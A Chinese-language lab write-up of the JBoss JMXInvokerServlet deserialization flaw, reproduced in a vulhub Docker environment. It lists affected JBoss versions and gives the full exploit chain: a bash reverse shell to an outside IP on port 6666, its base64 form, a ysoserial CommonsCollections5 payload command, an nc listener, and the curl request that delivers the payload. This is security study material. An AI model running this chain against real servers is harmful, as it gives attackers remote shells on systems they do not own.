漏洞介绍
这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象,然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码
影响范围
JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0
环境搭建
cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d
漏洞复现
http://172.16.1.78:8080/
1.POC,访问地址
172.16.1.78:8080/invoker/JMXInvokerServlet
返回如下,说明接⼝开放,此接⼝存在反序列化漏洞
2.下载 ysoserial ⼯具进⾏漏洞利⽤
https://github.com/frohoff/ysoserial
将反弹shell进⾏base64编码
bash -i >& /dev/tcp/47.113.231.0/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTMuMjMxLjAvNjY2NiAwPiYx
java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTMuMjMxLjAvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}">exp.ser
3.服务器设置监听得端⼝
nc -lvvp 6666
4.执⾏命令
curl 172.16.1.81:8080/invoker/JMXInvokerServlet
--data-binary @exp.ser
5.反弹成功
